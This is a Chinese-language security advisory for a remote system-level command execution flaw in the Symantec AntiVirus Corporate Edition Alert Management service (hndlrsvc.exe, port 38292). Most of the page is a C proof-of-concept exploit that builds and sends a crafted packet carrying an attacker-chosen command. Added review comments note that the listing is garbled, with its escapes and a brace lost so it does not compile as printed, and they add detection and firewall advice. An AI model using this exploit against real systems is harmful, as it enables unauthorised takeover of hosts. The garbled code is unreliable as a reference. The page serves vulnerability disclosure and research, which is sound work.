Symantec Antivirus企业版Alert Management服务远程权限提升漏洞
发布时间:2010-07-26
影响版本:
Symantec AntiVirus Corporate Edition 9.0
Symantec AntiVirus Corporate Edition 8.0
Symantec AntiVirus Corporate Edition 10.1
Symantec AntiVirus Corporate Edition 10.0
Symantec AntiVirus Corporate Edition 8.1
漏洞描述:
BUGTRAQ  ID: 41959

Symantec AntiVirus是非常流行的杀毒解决方案。

Symantec杀毒软件产品中使用Alert Management服务(AMS2)在旧版Symantec Antivirus企业版产品中创建、管理和报告警告。Intel Alert Handler服务(hndlrsvc.exe)为AMS2提供了警告创建和响应功能。由于Symantec产品没有正确地实现这个功能,能够在有漏洞主机的38292端口上创建TCP连接的攻击者可以在主机上执行任意系统级的命令。
<*参考
http://marc.info/?l=bugtraq&m=128015742312602&w=2
*>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
// POC code to execute commands on system vulnerable to AMS2
// design flaw of Intel Alert Handler service (hndlrsvc.exe)
// within Symantec SAVCE 10.1.8 and earlier
// ***Created by Spider July 2009***
//--------------------Foofus.net-------------------------


#include <stdio.h>

#include <dos.h>

#include <string.h>

#include <winsock.h>

#include <windows.h>


unsigned char payload[1000];

unsigned char inject1[] =

"xffxffxffxffxffxffxffxffx00x00"
"x02x00x95x94xc0xa8x02x64x00x00x00x00x00x00x00x00"
"xe8x03x00x00x50x52x47x58x43x4ex46x47x10x00x00x00"
"x00x00x00x00x04x41x4cx48x44x5cx46x00x00x01x00x00"
"x00x01x00x0ex00x52x69x73x6bx20x52x65x70x61x69x72"
"x65x64x00x25x00x53x79x6dx61x6ex74x65x63x20x41x6e"
"x74x69x56x69x72x75x73x20x43x6fx72x70x6fx72x61x74"
"x65x20x45x64x69x74x69x6fx6ex00xf9x1dx13x4ax3fx0c"
"x00x4cx41x42x53x59x53x54x45x4dx2dx31x00x08x08x0a"
"x00x52x69x73x6bx20x4ex61x6dx65x00x07x00x05x00x54"
"x65x73x74x00x08x0ax00x46x69x6cx65x20x50x61x74x68"
"x00x07x00x05x00x54x65x73x74x00x08x11x00x52x65x71"
"x75x65x73x74x65x64x20x41x63x74x69x6fx6ex00x07x00"
"x05x00x54x65x73x74x00x08x0ex00x41x63x74x75x61x6c"
"x20x41x63x74x69x6fx6ex00x07x00x05x00x54x65x73x74"
"x00x08x07x00x4cx6fx67x67x65x72x00x07x00x05x00x54"
"x65x73x74x00x08x05x00x55x73x65x72x00x07x00x05x00"
"x54x65x73x74x00x08x09x00x48x6fx73x74x6ex61x6dx65"
"x00x0ex00x0cx00x4cx41x42x53x59x53x54x45x4dx2dx31"
"x00x08x13x00x43x6fx72x72x65x63x74x69x76x65x20x41"
"x63x74x69x6fx6ex73x00x07x00x05x00x54x65x73x74x00"
"x00x07x08x12x00x43x6fx6ex66x69x67x75x72x61x74x69"
"x6fx6ex4ex61x6dx65x00x22x00x20";


unsigned char cmdother[] =
"x00x08x0cx00x43x6fx6dx6dx61x6ex64x4cx69x6ex65";


unsigned char inject2[] =
"x00x08x08x00x52x75x6ex41x72x67x73x00x04x00x02x00"
"x20x00x03x05x00x4dx6fx64x65x00x04x00x02x00x00x00"
"x0ax0dx00x46x6fx72x6dx61x74x53x74x72x69x6ex67x00"
"x02x00x00x00x08x12x00x43x6fx6ex66x69x67x75x72x61"
"x74x69x6fx6ex4ex61x6dx65x00x02x00x00x00x08x0cx00"
"x48x61x6ex64x6cx65x72x48x6fx73x74x00x0bx00x09x00"
"x44x45x41x44x42x45x45x46x00x00x00x00x00";


/* Print the usage line for this tool; proga is argv[0] as passed by main().
 * Clears the console by shelling out to "cls" first (Windows-only). */
void banner (char *proga)

 {

 system("cls");
 printf("nUse: %s <ip>  <command>n", proga);

 }


/* NOTE(review): PoC listing as reproduced on this page. The backslash escapes
 * in the string literals and at least one brace were lost when the page was
 * extracted, so this text does not compile as printed; it is kept only as the
 * advisory's reference. From the defender's side the observable behaviour is a
 * single unauthenticated TCP connection to 38292/tcp carrying a caller-supplied
 * string capped at 128 bytes: an inbound connection to that port on a host
 * running hndlrsvc.exe from anything other than the management server is the
 * detection signal, and restricting or firewalling that port to management
 * hosts is the mitigation while no vendor patch is listed on this page. */
int main ( int argc, char *argv[] )
{

SOCKET sock;
WSADATA wsa;
struct sockaddr_in addr;

printf("    __        ___      __   __                __    n");
printf(" | /  \ |    /  _/___ |__| _\ |___  _ __   | /  \ | n");
printf("\_\\  //_/   \_  \ . \|  |/ . / ._\| `_/  \_\\  //_/n");
printf(" .'/()\'.    /___/  _/|__|\___\___\|_|     .'/()\'. n");
printf(" \ \  / /        |_\                       \ \  / / n");
printf("              AMS Remote Command Tooln");


 /* unused */
 int port;

 if ( argc < 3 ) 
 
 banner(argv[0]);
 exit(0); 
 }


char *ip_addr = argv[1];

/* length of the user-supplied string; the 128-byte cap below is the only
 * bound applied to it before it is copied into the fixed 1000-byte buffer */
int length = (int)strlen(argv[2]);

if (length > 128)
 {
    /* "%s" with no matching argument in both messages: undefined behaviour,
     * the program may print garbage or crash on this error path */
    printf("n WARNING WARNING WARNING %s n");
    printf("n Input Command String Greater than 128 Characters is not Permited %s n");
    exit (0);
 }


// building injection packet  

 inject1[353] = length+3;
 inject1[355] = length+1;
 memcpy(payload,inject1,356);


 int a = 356;
  for (int i = 0; i<(length); i++)
  {
     a=a+1;payload[a] = argv[2][i];    
           }


 int b = a;
 for (int i = 0; i<=14; i++)
   {
     b=b+1;payload[b] = cmdother[i];    
 }


 int c = b;
 payload[c+2] = length+3;
 payload[c+4] = length+1;


 int d = c+5;
 for (int i = 0; i<length; i++)
   {
     d=d+1;payload[d] = argv[2][i];    
           }


 int e = d;
 for (int i = 0; i<=109; i++)
   {
     e=e+1;payload[e] = inject2[i];    
 }


// setting up socket and sending packet

 printf("[] preparing....n");

  /* return values of WSAStartup() and socket() are never checked; a failed
   * socket() makes the connect() below operate on INVALID_SOCKET */
  WSAStartup(MAKEWORD(2,0), &wsa);
 sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
 addr.sin_family = AF_INET;
 addr.sin_port = htons(38292);
 /* inet_addr() on an unparsable argv[1] returns INADDR_NONE; not checked here */
 addr.sin_addr.s_addr = inet_addr(ip_addr);


 printf("[] connecting..n");
 if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 )
 { printf("[-] connection failed!n"); exit(0); }

 printf("[] sending crafted packet 1 ...n");
 if ( send(sock, payload, sizeof(payload), 0) == -1 )
 { printf("[-] send failed!n"); exit(0); }



closesocket(sock);
WSACleanup();

return 0;

}
安全建议:
暂无
厂商补丁:

Symantec
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.symantec.com/